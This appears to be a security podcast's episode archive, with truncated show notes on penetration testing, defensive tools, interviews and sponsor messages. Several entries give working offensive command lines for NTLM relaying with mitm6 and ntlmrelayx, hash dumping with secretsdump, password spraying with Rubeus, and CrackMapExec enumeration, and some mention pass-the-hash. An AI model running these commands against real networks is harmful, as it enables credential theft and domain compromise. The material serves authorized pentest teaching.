Today me and my pal Paul from Project7 did a live hacking session and finally got the Callahan Auto brake pad Web app back online! Hopefully you enjoyed this hacking series. The feedback has been great, so we may have...

View this episode's show notes for more information

Published: Friday, July 07, 2023

Hey friends, today we're continuing our series on pwning the Tommy Boy VM on VulnHub VM! P.S. did you miss part one? Check it out on YouTube . Joe "The Machine" Skeen and I had a blast poking and...

• It's always a good idea to look at a site's robots.txt file
• crunch is awesome for making wordlists
• fcrackzip is rad for cracking encrypted zip files
• dirbuster works well for busting into hidden files and subfolders
• exiftool works well to pull metadata out of images

View this episode's show notes for more information

Published: Friday, June 30, 2023

Today I'm excited to share a featured interview with our new friend Mike Toole of Blumira . We talk about all things EDR, including:.

• How does it differ from something like Windows Defender?
• What things do I need to keep in mind if I'm in the market for an EDR purchase?
• Is Mac EDR any good?
• How do attackers bypass EDR?
• Will AI create industructible malware, take over the human race and then use our bodies for batteries?

View this episode's show notes for more information

Published: Friday, June 16, 2023

Holy schnikes - this episode is actually 7 minutes long! What a concept!Anyway, today I give you a couple tips that have helped me pwn some internal networks the last few weeks, including:.

• Getting a second (and third?) opinion on Active Directory Certificate Services vulnerabilities!
• Analyzing the root domain object in BloodHound to find some misconfigs that might equal instant domain admin access!

View this episode's show notes for more information

Published: Friday, June 09, 2023

Hey friends! Today we're taking a second look at ADHD - Active Defense Harbinger Distribution - a cool VM full of tools designed to annoy/attribute/attack pesky attackers! The tools covered today include: PHP-HTTP-TARPIT A tool to confuse and waste...

View this episode's show notes for more information

Published: Friday, June 02, 2023

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! Hey friends! Today we're looking at...

View this episode's show notes for more information

Published: Friday, May 26, 2023

Today we're talking about reducing anxiety by hacking your mental health with these tips:.

• Using personal automation to text people important reminders
• Using Remind to create a personal communication "class" with your family members
• Using Smartsheet (not a sponsor) to create daily email "blasts" to yourself about all the various project todos you need to tackle

View this episode's show notes for more information

Published: Saturday, May 20, 2023

Today we look at LDAP Firewall - a cool (and free!) way to defend your domain controllers against SharpHound enumeration, [LAPS](https://techcommunity.microsoft.com/t5/windows-it-pro-blog/by-popular-demand-...

View this episode's show notes for more information

Published: Friday, May 12, 2023

Hey friends! This week I spoke at the Secure360 conference in Minnesota on Simple Ways to Test Your SIEM . This is something I covered a while back on the podcast,...

• Questions you can ask a prospective SIEM/SOC solution to figure out which one is the right fit for you
• All the tools/tips/scripts/etc. you need to run through 7 (and more!) simple ways to test your SIEM!

View this episode's show notes for more information

Published: Friday, May 05, 2023

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!In today's episode we staged an NTLM...

View this episode's show notes for more information

Published: Friday, April 28, 2023

Today we're excited to share a featured interview with our new friend Jim Simpson, CEO of Blumira . Jim was in security before it was hip/cool/lucrative, working with a number of startups as well as some big names like Duo. Blumira and 7 Minute Security have a shared...

View this episode's show notes for more information

Published: Friday, April 21, 2023

Hey friends, today we're playing with the new (April 2023) version of Local Administrator Password Solution (LAPS) . Now it's baked right into PowerShell and the AD Users and...

View this episode's show notes for more information

Published: Friday, April 14, 2023

Hey friends, today we're talking about building an intentionally vulnerable SQL server, and here are the key URLs/commands talked about in the episode:setup.exe /Q /IACCEPTSQLSERVERLICENSETERMS /ACTION="install" /FEATURES=SQL /INSTANCENAME=MSSQLSERVER /TCPENABLED=1 /NPENABLED=1...

• Download SQL Server here
• Install SQL via config .ini file
• Or, install SQL via pure command line
• Deploy SQL with a service account while also starting TCP/IP and named pipes automagically:
• Run PowerUpSQL to find vulnerable SQL servers:
• Audit the discovered SQL servers:
• Fire off stored procedures to catch hashes!

View this episode's show notes for more information

Published: Friday, March 31, 2023

Ok, I know we say this every time, but it is true this time yet again: this is our favorite tale of pentest pwnage. It involves a path to DA we've never tried before, and introduced us to a new trick that one of our favorite old tools can do:rubeus.exe monitor /interval:5 /nowrap /runfor:60...

View this episode's show notes for more information

Published: Friday, March 24, 2023

Hey friends, today we talk through how to simulate ransomware (in a test environment!) using Infection Monkey . It's a cool way to show your team and execs just how quick and deadly an infection can be to your business. You can feed the monkey a list of...

View this episode's show notes for more information

Published: Friday, March 17, 2023

Today we offer you some first impressions of OVHcloud and how we're seriously considering moving our Light Pentest LITE training class to it! TLDR:.

• It runs on vCenter, my first and only virtualization love!
• Unlimited VM "powered on" time and unlimited bandwidth
• Intergration with PowerShell so you can run a single script to "heal" your environment to a gold image
• Easy integration with pfSense to be able to manage the firewall and internal/external IPs
• Price comparable to what we're paying now in Azure land

View this episode's show notes for more information

Published: Friday, March 10, 2023

Hey friends, today we're covering part 2 of our series all about cracking and mapping and execing with CrackMapExec. Specifically we cover: # Enumerate where your user has local admin rights: cme smb x.x.x.x/24 -u user -p password # Set wdigest flag: cme smb x.x.x.x -u user -p password -M wdigest...

View this episode's show notes for more information

Published: Friday, March 03, 2023

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! Hey friends, today we covered many...

View this episode's show notes for more information

Published: Friday, February 24, 2023

Today’s episode is brought to us by Blumira, which provides easy to use, automated detection and response that can be setup in…well…about 7 minutes! Detect and resolve security threats faster and prevent breaches. Try it free today at blumira.com/7ms !Today I sat down...

• How do I get started in looking for a cyber policy - with my general liability insurer? Or are there companies that specialize just in cyber insurance?
• How do I make sure I have the appropriate levels of coverage?
• What are basic things I can do from a security standpoint that pretty much any insurer is going to expect me to do?

View this episode's show notes for more information

Published: Friday, February 17, 2023

Hey friends, I took a mental health break this week and pre-podcasted this episode of a new series called 7MOOCH: 7 Minutes of Only Chuckles. In today's story, we unpack a situation in Hawaii that made me exclaim the following quite loudly: "Dolphin rides are done, dude!"

View this episode's show notes for more information

Published: Tuesday, February 07, 2023

Today we continue part 2 of a series we started a few weeks ago all about building a vulnerable pentesting lab. Check out the video above, and here are the main snippets of code and tips to get you going:sudo python ./youzer.py...

• Use Youzer to import a bunch of bogus users into your Active Directory:
• Make a Kerberoastable user:

View this episode's show notes for more information

Published: Friday, January 27, 2023

Today we're talking about Teleseer , which is an awesome service to give you better network visibility - whether you're on the blue, red or purple team! It all starts with a simple packet capture, and ends with gorgeous visuals and insight into what the heck is on your...

View this episode's show notes for more information

Published: Friday, January 20, 2023

Today's episode is brought to us by our friends at Blumira ! Today we kick off a series all about building your own vulnerable pentest lab from scratch, specifically: Here are the code snippets that help you get an Active Directory environment going on the quick: # Get...

• Spinning up a domain controller with a few lines of PowerShell
• Installing Active Directory Domain Services
• Setting up an intentionally cruddy password policy
• Baking in the MS14-025 vulnerability

View this episode's show notes for more information

Published: Friday, January 13, 2023

Today we're releasing version 1.1 of our Light Pentest eBook . Changes discussed in today's episode (and shown live in the accompanying YouTube video ) include:.

• Some typos and bug fixes
• A new section on finding systems with unconstrained delegation and exploiting them
• A new section on finding easily pwnable passwords via password spraying
• A new section relaying credentials with MITM6 (be careful using some of its options - read this )
• New ways (and some words of warning ) to dump hashes from Active Directory

View this episode's show notes for more information

Published: Friday, January 06, 2023

Today we talk about Simple Ways to Test Your SIEM. Feel free to check out the YouTube version of this presentation, as well as our interview with Matt from Blumira for even more...

View this episode's show notes for more information

Published: Friday, December 30, 2022

Hey friends, today's episode is hosted by an AI from Murf.ai because I suffered a throat injury over the holidays and spent Christmas morning in the emergency room! TLDL: I'm fine, but if you want the (sort of) gory details and an update on my condition after my ENT...

View this episode's show notes for more information

Published: Saturday, December 24, 2022

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Today's tale of pentest pwnage covers...

• Teleseer for packet capture visualizations on steroids!
• Copernic Desktop Search
• Running Responder as Responder.py -I eth0 -A will analyze traffic but not poison it
• I like to run mitm6 in one window with mitm6.py -i eth0 -d mydomain.com --no-ra --ignore-nofqdn and then in another window I do ntlmrelayx.py -6 -wh doesntexist -t ldaps://ip.of.the.dc -smb2support --delegate-access > relaysRphun.log - that way I always have a log of everything happening during the mitm6 attack
• Vast.ai looks to be a cost-effective way to crack hashes in the cloud (haven't tested it myself yet)

View this episode's show notes for more information

Published: Friday, December 16, 2022

Today we welcome our pal Matthew Warner (CTO and co-founder of Blumira ) back to the show for a third time (his first appearance was #507 and second was [#529](https://7ms.us/7ms-529-interview-with-matthew-...

• ASAAdmins
• Account Operators
• Administrators
• Administrators
• Backup Operators
• Cert Publishers
• Certificate Service DCOM
• DHCP Administrators
• Debugger Users
• DnsAdmins
• Domain Admins
• Enterprise Admins
• Enterprise Admins
• Event Log Readers
• ExchangeAdmins
• Group Policy Creator Owners
• Hyper-V Administrators
• IIS_IUSRS
• IT Compliance and Security Admins
• Incoming Forest Trust Builders
• MacAdmins
• Network Configuration Operators
• Schema Admins
• Server Operators
• ServerAdmins
• SourceFireAdmins
• WinRMRemoteWMIUsers
• WorkstationAdmins
• vCenterAdmins

View this episode's show notes for more information

Published: Friday, December 09, 2022

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Hey friends, today's...

• Things we keep getting caught doing (and some potential ways to not get caught! Responder SharpHound CrackMapExec - specifically running -x or -X to enumerate systems PowerHuntShares
• Responder
• SharpHound
• CrackMapExec - specifically running -x or -X to enumerate systems
• PowerHuntShares
• "FUD sprinklers" - people who cast fear, uncertainty and doubt on your pentest findings
• A story about the time I took down a domain controller (yikes)

View this episode's show notes for more information

Published: Friday, December 02, 2022

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today my friends...

View this episode's show notes for more information

Published: Friday, November 25, 2022

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Happy belated Thanksgiving!This is not a...

View this episode's show notes for more information

Published: Friday, November 18, 2022

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today we're talking...

View this episode's show notes for more information

Published: Friday, November 11, 2022

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today we're talking...

View this episode's show notes for more information

Published: Friday, November 04, 2022

Today’s episode of the 7 Minute Security podcast is brought to you by Blumira, which provides easy-to-use automated detection and response that can be set up in…well..about 7 minutes. Detect and resolve security threats faster, and prevent breaches. Try it free today at blumira.com/7ms.Hey...

View this episode's show notes for more information

Published: Friday, October 28, 2022

Today’s episode is brought to us by Blumira, which provides easy to use, automated detection and response that can be setup in…well…about 7 minutes! Detect and resolve security threats faster and prevent breaches. Try it free today at blumira.com/7ms !Today we have a...

View this episode's show notes for more information

Published: Friday, October 21, 2022

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Hey friends! Today we...

View this episode's show notes for more information

Published: Friday, October 14, 2022

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.In today's episode we...

View this episode's show notes for more information

Published: Friday, October 07, 2022

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Today we talk about configuring your...

View this episode's show notes for more information

Published: Friday, September 30, 2022

Today we're excited to kick off a new series all about blue team bliss - in other words, we're talking about pentest stories where the blue team controls kicked our butt a little bit! Topics include:In the tangent department:.

• The ms-ds-machineaccount-quota value is not an "all or nothing" option! Check out Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > User Rights Assignment > Add workstations to domain.
• We installed LAPS on Twitch last week and it went pretty well! We'll do it again in an upcoming livestream .
• Defensive security tools that can interrupt the SharpHound collection!
• EDRs are pretty awesome at catching bad stuff - and going into full "shields up" mode when they're irritated!
• This is me if I was a rapper .
• This car made me giggle:

View this episode's show notes for more information

Published: Friday, September 23, 2022

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today we revisit a...

• How the internal 7MS infosec policy development is coming along
• Why I’m no longer going to be “product agnostic” going forward
• Some first impressions of a new tool I’m trying called ITGlue (not a sponsor)
• How to start building a critical asset list - and how it shouldn’t overlook things like domain names and LetsEncrypt certs

View this episode's show notes for more information

Published: Friday, September 16, 2022

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Hey friends! Today we're giving you a...

View this episode's show notes for more information

Published: Friday, September 09, 2022

Today’s episode is brought to us by Blumira, which provides easy to use, automated detection and response that can be setup in…well…about 7 minutes! Detect and resolve security threats faster and prevent breaches. Try it free today at blumira.com/7ms !In today's episode...

• If you find yourself with "owns" rights to a bajillion hosts in BloodHound, this query will give you a nice list of those systems, one system per line:
• For resource based constrained delegation attacks, check out this episode of pwnage for some step-by-step instructions.
• If you have RBCD admin access to victim systems, don't forget that CrackMapExec support Kerberos! So you can do stuff like:
• Take the time to search SMB shares with something like PowerHuntShares . If you have write access in places, drop an SCF file to capture/pass hashes!
• Looking to privilege escalate while RDP'd into a system? You owe it to yourself to check out KrbRelayUp !
• Ever find yourself with cracked hashcat passwords that look something like '$HEX[xxxx]'? Check this tweet from mpgn for a great cracking tip!

View this episode's show notes for more information

Published: Friday, September 02, 2022

Today we're so excited to welcome Amanda Berlin , Lead Incident Detection Engineer at Blumira , back to the show (did you miss Amanda's first appearance on the show? Check it out [here](https://7ms.us/7ms-518-interview-with-amanda-berlin-...

• What if HAFNIUM2 comes out today and only affects 2 specific versions of Exchange? Does Blumira buy every software/hardware thingy out there and have an evil scientist lab where they test out all these different exploits, and then create detections for them?
• Can an old, out-of-touch security guy like me still find a place at the Vegas hacker conferences (even though I hate lines, heat, crowds and partying)? Spoiler alert: yes.
• Are security vendors more likely to share their software/hardware security services with a defensive security group like Blumira, rather than pentesters like 7MinSec?
• Does Amanda think there's a gender bias in the security industry?
• Besides being aware of it happening, what can we do to cut down the bullying/secure-splaining/d-baggery/etc. in the industry?

View this episode's show notes for more information

Published: Sunday, August 28, 2022

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today's episode...

View this episode's show notes for more information

Published: Friday, August 19, 2022

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. Hey friends, today...

• If you find you have local admin on a bunch of privileges and want to quickly loop through a secretsdump of ALL systems and save the output to a text file, this little hacky script will do it!
• Got an NTLM hash for a privileged user and want to PS remote into a victim system? You can essentially do a PowerShell login pass-the-hash with evil-winrm !
• The Brute Ratel crisis monitor is awesome for watching a box and monitoring for people logging in and out of it (perfect for getting ready to strike with lsass dumps!)

View this episode's show notes for more information

Published: Friday, August 12, 2022

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Ok, ok, I know. I...

• PowerHuntShares is awesome at finding SMB shares and where you have read/write permissions on them. Note there is a -Threads flag to adjust the intensity of your scan.
• Are your mitm6 attacks not working properly - even though they look like they should? There might be seem LDAP/LDAPs protections in play. Use LdapRelayScan to verify!
• Are you trying to abuse Active Directory Certificate Services attack ESC1 but things just don't seem to be working? Make sure the cert you are forging is properly representing the user you are trying to spoof by using Get-LdapCurrentUser.ps1 . Also look at PassTheCert as another tool to abuse ADCS vulnerabilities.
• If you manage to get your hands on an old Active Directory backup, this PowerShell snippet will help you get a list of users from the current domain, sorted by passwordlastset. That way you can quickly find users who haven't changed their password since the AD backup:

View this episode's show notes for more information

Published: Saturday, August 06, 2022

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! Hey friends, wow...we're up to thirty-...

View this episode's show notes for more information

Published: Monday, August 01, 2022

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today we're joined by...

• Knowing what you have (assets, installed software, etc.) - Rumble is a cheap/free way to find out!
• Creating core policies and procedures that you will actually follow
• Learning about security frameworks that will help you build a security program from scratch
• Preparing for your first (or next) pentest. Tools like PingCastle and BloodHound can help find hacker low-hanging fruit!
• Knowing where your crown jewels are - be that data, a database, a key system, etc.
• Writing critical documentation - especially backup/restore procedures.
• Forming a security "dream team" to help drive your program
• Asking the right security maturity questions at your next job interview (so you don't get hired into a dumpster fire!)

View this episode's show notes for more information

Published: Friday, July 22, 2022

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Hey friends, we have...

• Get-InternalSubnets.ps1 - for getting internal subnets
• Adalanche for grabbing Active Directory info (similar to SharpHound)
• Copernic Desktop Search for pillaging through shares with Google-like search capabilities!
• PowerHuntShares is my new favorite tool for enumerating network shares and associated permissions!
• CeWL for creating awesome wordlists to crack with!

View this episode's show notes for more information

Published: Friday, July 15, 2022

Today we're featuring a great interview with Matthew Warner, CTO and co-founder of Blumira . You might remember Matt from such podcasts as this one ) when Matt gave us a fountain of info on why out-of-the-...

• How do companies like Blumira (who we rely on to stay on top of threats) keep their teams on top of threats?
• Why open source detections are a great starting point - but not a magic bullet
• Consider this "what if" - a C2 beacon lands on your prod file server in the middle of the work day. Do you take it down during a busy time to save/clean the box as much as possible? Or do you hope to be able to wait until the weekend and triage it on a weekend?
• Why annoying traffic/alerts are still worth having a conversation about. For example, if you RDP out of your environment and into Azure, that might be fine. But what about when you see an RDP connection going out to a Digital Ocean droplet? Should you care? Well, do you use Digital Ocean for legit biz purposes?
• Data exfiltration - where does it sit on your priority list? How hard is it to monitor/block?
• Common lateral movement tools/techniques
• Why honeypots rule!

View this episode's show notes for more information

Published: Friday, July 08, 2022

Today's episode is sponsored by Blumira !In today's episode, I try to get us thinking about our extended family's emergency/DR plan. Why? Because I recently had a close family member suffer a health scare, and it brought to light some questions we didn't have all the...

• Do we have creds to log onto his computer?
• How about his email accounts?
• Do we have usernames/passwords for retirement accounts, bank accounts, etc.?
• For vehicles/ATVs/boats/etc. - do we have documentation about their service records? How about titles?
• Can we get into his phone to get key info off of text messages and grab phone #s of key contacts?
• What are his wishes if he were to pass? Do not resuscitate? How is the money getting handled? Cremation vs. burial?
• Do we have redundancy in this plan, or is it all on paper in a file somewhere?

View this episode's show notes for more information

Published: Friday, July 01, 2022

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!In today's episode we talk about [Purple...

View this episode's show notes for more information

Published: Friday, June 24, 2022

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today's another fun...

• Under Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > Security Options set Interactive logon: Number of previous logons to cache to 0. Be careful, as you will have login problems if a domain controller is not immediately accessible!

View this episode's show notes for more information

Published: Friday, June 17, 2022

Today we're sharing an updates to episode #512 where we ran Rapid7's InsightIDR through a bunch of attacks:In today's episode I share some emails and conversations we had with Rapid7 about...

• Active Directory enumeration via SharpHound
• Password spraying through Rubeus
• Kerberoasting and ASREPRoasting via Rubeus
• Network protocol poisoning with Inveigh . Looking for a free way to detect protocol poisoning? Check out CanaryPi .
• Hash dumping using Impacket . I also talk about an interesting Twitter thread that discusses the detection of hash dumping.
• Pass-the-hash attacks with CrackMapExec
• Getting Started with Rapid7 InsightIDR: A SIEM Tutorial
• Testing & Evaluating SIEM Systems: A Review of Rapid7 InsightIDR

View this episode's show notes for more information

Published: Friday, June 10, 2022

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.I'm extra psyched...

View this episode's show notes for more information

Published: Friday, June 03, 2022

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Well friends, it has been a while since...

• Password settings: select Enabled and then tweak settings to your liking. Personally, I like my password policies how I like my mint hot cocoas. Strong.
• Name of administrator account to manage: careful here! If you're just going to use built in Administrator account, do not enable this setting. Otherwise do enable it and type in the account you want to manage (like localadmin or helpdesk or whatever you call your account that's deployed across your servers and workstations)
• Do not allow password expiration time longer than required by policy: set to Enabled.
• Enable local admin password management: set to Enabled.
• For the x86 package, add it as Assigned. Once the package appears, right click it and click Properties. Then under Deployment > Advanced, untick the box that says Make this 32-bit x86 application available to Win64 machines.
• For the x64 package, add it as Assigned.

View this episode's show notes for more information

Published: Friday, May 27, 2022

[fusion_builder_container type="flex" hundred_percent="no" equal_height_columns="no" hide_on_mobile="small-visibility,medium-visibility,large-visibility" background_position="center center" background_repeat="no-repeat" fade="no" background_parallax="none" parallax_speed="0.3"...

View this episode's show notes for more information

Published: Friday, May 20, 2022

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. Hey friends! Today's...

View this episode's show notes for more information

Published: Friday, May 13, 2022

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Hey friends, today...

• Setting the right communication cadence - and communication channels - with a customer during a pentest.
• Tips for collaborating well with contractors so that the customer experience feels like "a single human pane of glass" (insert barf emoji here).
• How we're using Intercom to publish self-help/FAQ articles for 7MS.

View this episode's show notes for more information

Published: Saturday, May 07, 2022

Hey friends, it's another fun tale of pentest pwnage today! This one talks about cool things you can do when you have full rights over an OU in Active Directory. Important links to review:.

• BloodHound edges
• DACL Trouble: Generic All on OUs
• AD prep bug in Windows Server 2016

View this episode's show notes for more information

Published: Thursday, April 28, 2022

Today we're pumped to share a featured interview with Amanda Berlin , Lead Incident Detection Engineer at Blumira . You might already be familiar with Amanda's awesome [Defensive Security Handbook](https://www.amazon.com/Defensive-Security-...

• Can you tell us more about your infosec superhero origin story and creation of your book?
• Will there ever be a new version of the Defensive Security Handbook?
• What blue team certs/YouTube vids/classes/conferences give the best bang for your buck?
• Was it a mistake to invent computers?
• From a logging standpoint, what devices provide blind spots (Linux systems, ioT devices, etc.)?
• You can wave a magic wand and solve any three security challenges instantly - what do you choose?
• Infosec Twitter drama. Love it? Leave it? Something inbetween?
• Tips to prevent business email compromise?
• How do we keep beloved family/friends (who keep falling prey to social engineering campaigns) safer on their computers and on the Web?
• Our company had a partial ransomware deployment a few years ago. Is changing Active Directory passwords changed and formatting affected systems enough? (Spoiler alert: no. See Microsoft's advice on the topic)

View this episode's show notes for more information

Published: Friday, April 22, 2022

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today we're...

View this episode's show notes for more information

Published: Thursday, April 14, 2022

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!In today's episode I talk about a cool...

View this episode's show notes for more information

Published: Wednesday, April 06, 2022

Today we continue the series we started a few years ago called Security Your Family During and After a Disaster (the last part in this series was from a few years ago . In today's episode we focus on some...

View this episode's show notes for more information

Published: Wednesday, March 30, 2022

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Welcome to another fun tale of pentest...

• I'm seeing nmap scans get flagged a bit more from managed SOC services. Maybe a "quieter" nmap scan will help get enough ports to do a WitnessMe run, but still fly under the logging/alerting radar? Something like: nmap -p80,443,8000,8080 subnet.i.wanna.scan/24 -oA outputfile
• Using mitm6 in "sniper" mode by targeting just one host with: mitm6 -hw victim-I-want-to-get-juicy-info-from -d victim.domain --ignore-nofqdn
• Using secretsdump to target a single host: secretsdump.py -target-ip 1.2.3.4 localadmin:@1.2.3.4 -hashes THIS-IS-WHERE-THE:SAM-HASHES-GO. Note the colon after localadmin - it's intentional, NOT an error!
• Rubeus makes password spraying easy-peasy! Rubeus.exe spray /password:Winter2022 /outfile:output.txt. Get some hits from that effort? Then spray the good password against ALL domain accounts and you might get even more gold!
• LDAPs relaying not working? Make sure it's config'd right: nmap -p636 -sV -iL txt-file-with-dcs-in-it

View this episode's show notes for more information

Published: Thursday, March 24, 2022

Today we're joined by our friends Christopher Fielder and Jon Crotty from Arctic Wolf to talk about their interesting report on The State of Cybersecurity: 2022 Trends (note: you can get some of the...

• Many orgs are running the bare minimum (or nothing!) for endpoint protection
• Cyber insurance costs are going up, and some customers are unable to afford it - or they're getting dropped by their carrier altogether
• Security is still not getting a seat at the decision-making table in a lot of orgs, and already-overburned IT teams taking on security as part of their job descriptions as well
• Seems like everybody and their mom is moving infrastructure to the cloud, but few are managing that attack surface, thus increasing risk
• The cyber skills gap remains a challenge - many security gurus are looking to get out of their current position, leading many orgs to hire inexperienced teams who make rushed/misinformed decisions about security tools and services, thus making the org less secure

View this episode's show notes for more information

Published: Thursday, March 17, 2022

This episode of 7 Minute Security is sponsored by Datadog. Now offering Cloud Security Posture Management (CPSM), Datadog provides one-click compliance posture. Built on the unified Datadog Agent and platform-wide cloud integrations, you can easily get set up minutes. Try it for yourself today...

View this episode's show notes for more information

Published: Friday, March 11, 2022

Today we're continuing our series focused on [owning a security consultancy], talking specifically about:.

• How not to give up on warm sales leads, even if they haven't panned out for 5+ years!
• Some cool Mac tools that help me manage 7MS - such as Craft and OmniFocus
• A sneak peek at a SIEM vendor that will soon be featured in an episode of Desperately Seeking a Super SIEM for SMBs

View this episode's show notes for more information

Published: Wednesday, March 02, 2022

Today we share some first impressions of Tailscale , a service that advertises itself as "Zero config VPN. Installs on any device in minutes, manages firewall rules for you, and works from anywhere." Is it really that cool and easy? Listen to today's episode to find out!

View this episode's show notes for more information

Published: Wednesday, February 23, 2022

Today we revisit our phishing series with a few important updates that help us run our campaigns more smoothly, such as creating a simple but effective fake O365 portal, and being aware that some email systems may "pre-click" malicious links...

View this episode's show notes for more information

Published: Friday, February 18, 2022

Hey friends! We have another fun test of pentest pwnage to share with you today, which is kind of tossed in a blender with some first impressions of ShellcodePack . We were on a bunch of pentests recently where we needed to dump credentials out of memory. We...

View this episode's show notes for more information

Published: Wednesday, February 09, 2022

Today's featured interview is with Matthew Warner, CTO and co-founder of Blumira . We had a great chat about why out-of-the-box Windows logging isn't super awesome, "free" ways to get logging turned up to 11 ( [Microsoft's audit policy...

View this episode's show notes for more information

Published: Thursday, February 03, 2022

Today's my favorite tale of pentest pwnage (again)! This time we're talking about sAMAccountName spoofing specifically. We also talk about my always-under-construction list of things I try early in a pentest for...

• Run PingCastle
• Do the SharpHound/BloodHound dumps
• Run the DHCP poisoning module of Responder
• Check the ms-DS-MachineAccountQuota value in the domain - if its at the default (10), then any user can add machines to the domain.

View this episode's show notes for more information

Published: Friday, January 28, 2022

Hey friends, today I talk about the old school way I used to pwn wifi networks, then a more modern way, and then my new favorite way (spoiler alert: I use Bettercap ). For some background, I found that the [Alfa Long-Range Dual-Band AC1200 Wireless USB...

View this episode's show notes for more information

Published: Thursday, January 20, 2022

Hey friends, today we're talking about how to monitor all your cloud thingies (Web servers, mail servers, etc.) with UptimeRobot . And I'm sharing some fun tips to monitor your internal thingies as well - without the use of any extra agent software.A few tips:If you...

• I took a concealed carry course
• I went flying with my boys
• Willy's Wonderland is mindless, popcorn-munching fun, but Pig and The Card Counter are outstanding!

View this episode's show notes for more information

Published: Wednesday, January 12, 2022

Today's episode is all about Brute Ratel , a command and control center that is super cool, quick to setup, and much easier to use (IMHO) than Cobalt Strike. I also talk specifically about some of my favorite command line features, how slick and simple lateral movement...

View this episode's show notes for more information

Published: Wednesday, January 05, 2022

Happy new year friends! Today I share the good, bad, ugly, and BROKEN things I've come across while migrating our Light Pentest LITE training lab from on-prem VMware ESXi to Azure. It has been a fun and frustrating process, but my hope is that some of the...

• No longer relying on a single point of failure (Intel NUC, switch, ISP, etc.)
